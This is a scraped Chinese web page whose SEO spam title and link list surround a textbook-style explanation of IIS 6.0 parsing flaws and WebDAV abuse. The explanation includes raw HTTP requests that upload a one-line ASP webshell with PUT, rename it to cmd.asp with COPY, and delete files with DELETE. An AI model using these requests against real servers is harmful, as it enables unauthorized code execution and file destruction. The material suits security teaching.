当前位置: 首页 > news >正文

网站建设流程体会网站建设取得实效

news 2026/4/25 10:19:53
网站建设流程体会,网站建设取得实效,网页美工设计工作内容,网站建设费用预算IIS 6.0在解析文件时存在以下两个解析漏洞。 ①当建立*.asa、*.asp格式的文件夹时#xff0c;其目录下的任意文件都将被IIS当作asp文件来解析。 例如#xff1a;建立文件夹 parsing.asp#xff0c;在 parsing.asp 文件夹内新建一个文本文档 test.txt#xff0c;其内容为其目录下的任意文件都将被IIS当作asp文件来解析。 例如建立文件夹 parsing.asp在 parsing.asp 文件夹内新建一个文本文档 test.txt其内容为%NOW%然后在浏览器内访问。 “NOW”是ASP提供获取当前时间的函数TXT是文本文档格式IIS是不会去解析此类文件的应该会直接显示其内容而在 parsing.asp文件夹中却被当作ASP脚本来解析。 ② 当文件为*.asp1.jpg时IIS 6.0同样会以ASP脚本来执行如新建文件 test.asp1.jpg内容为%NOW% 微软并不认为这是一个漏洞也一直没有推出IIS 6.0的补丁所以这两个漏洞至今还存在让无数的网站“死”在了IIS 6.0解析漏洞之上。 说到IIS容器就不得不提起一个经典的漏洞漏洞名为WebDav。 WebDavWeb-based Distributed Authoring and Versioning是一种基于HTTP1.1协议的通信协议它扩展了HTTP协议在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法使HTTP协议更强大。 在开启WebDav扩展的服务器后如果支持PUT、Move、Copy、Delete等方法就可能会存在一些安全隐患比如www.secbug.org服务器IIS 6.0 Web容器支持WebDav并且存在PUT、Move、Copy、Delete等方法那么攻击者就可能通过PUT方法向服务器上传危险脚本文件测试步骤如下。 第一步通过OPTIONS探测服务器所支持的HTTP方法。请求 OPTIONS / HTTP/1.1 Host:www.secbug.org 响应 HTTP/1.1 200 OK Cache-Control:private Date: Mon,19 Aug 2013 09:41:45 GMT Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPPATCH, SEARC H,MKCOL,LOCK,UNLOCK Content-Length: 0 Accept-Ranges: none Server: Microsoft-IIS/6.0 MS-Author-Via: DAV DASL:DAV:sqlDAV: 1, 2 Public:OPTIONS,TRACE,GET,HEAD,DELETE,PUT,POST,COPY,MOVE,MKCOL,PROPFIND,PROPPATCH,LOCK,UNLOCK,SEARCH Set-Cookie:_D_SID89113465;path/; 第二步通过PUT方法向服务器上传脚本文件。 请求 PUT/a.txt HTTP/1.1 Host:www.secbug.org Content-Length:30 %eval request(chopper)% 响应 HTTP/1.1 201 Created Date: Mon,19 Aug 2013 09:48:10 GMT Allow:OPTIONS,TRACE,GET,HEAD,DELETE,PUT,COPY,MOVE,PROPFIND,PROPPATCH, SEARCH,LOCK,UNLOCK Content-Length: 0 Location:http://www.secbug.org/a.txt Server: Microsoft-IIS/6.0 第三步通过Move或Copy方法改名 COPY /a.txt HTTP/1.1 Host:www.secbug.org Destination:http://www.secbug.org/cmd.asp HTTP/1.1 201 Created Date: Mon,19 Aug 2013 09:53:43 GMT Content-Length: 0 Content-Type: text/xml Location:http://www.secbug.org/cmd.asp Server: Microsoft-IIS/6.0 通过这三个步骤攻击者就可以轻易获取一个WebShell。 如果服务器开启了DELETE方法攻击者还可以删除服务器上的任意文件。 DELETE /a.txt HTTP/1.1 Host:www.secbug.org HTTP/1.1 200 OK Date: Mon,19 Aug 2013 10:02:08 GMT Content-Length: 0 Server: Microsoft-IIS/6.0 Set-Cookie: _D_SID89113465; path/;
http://www.hkea.cn/news/14406952/

相关文章:

  • 律师网站设计企业网站建设重要性
  • 网站seo快速排名创建网站的步骤是
  • 网站建设实录音乐学院网站的系统建设方式
  • 广安建设局网站应聘网站开发的自我介绍
  • 长沙学做网站建设头像设计易做图网站
  • 贵州建网站手机网站Com
  • 网文网站无锡网站建设制作设计
  • ic手机网站开发平台赣州seo排名
  • 免费手机小说网站建设iis搭建网站时
  • 网站建设询价公告招聘门户
  • 南昌网站关键词推广行政单位单位网站建设
  • 网站设计 北京 010什么是网络营销的主要职能之一
  • 怎么做倒计时网站电子商务网站平台建设费用
  • 开发手机网站多少钱网站开发和美工的区别
  • 安徽建设学校官方网站网站关键词密度过高
  • 多个wordpress站点互相品牌做网站
  • 网站建设项目内容搜索引擎网络排名
  • wordpress本地搭建网站a力天装饰口碑怎么样
  • 高端网站建设公司推荐html网页设计作品中国传统文化
  • 青岛市北建设集团网站crm管理是什么意思
  • 建设一个网站的费用做网站发布信息
  • 广州网站下载安装wordpress 弹窗代码
  • 株洲专业建设网站建设银行青海省分行门户网站
  • 团购网站开发语言个人备案做门户网站
  • u网站建设电子商务网站建设阶段
  • 怎样推广网站平台优化工作流程
  • dede网站名称不能中文专业电容层析成像代做网站
  • 做数学网站福州seo推广
  • 哪些网站做的海报比较高大上肖港网站开发
  • 网站标签怎么做跳转网站安全狗 拦截301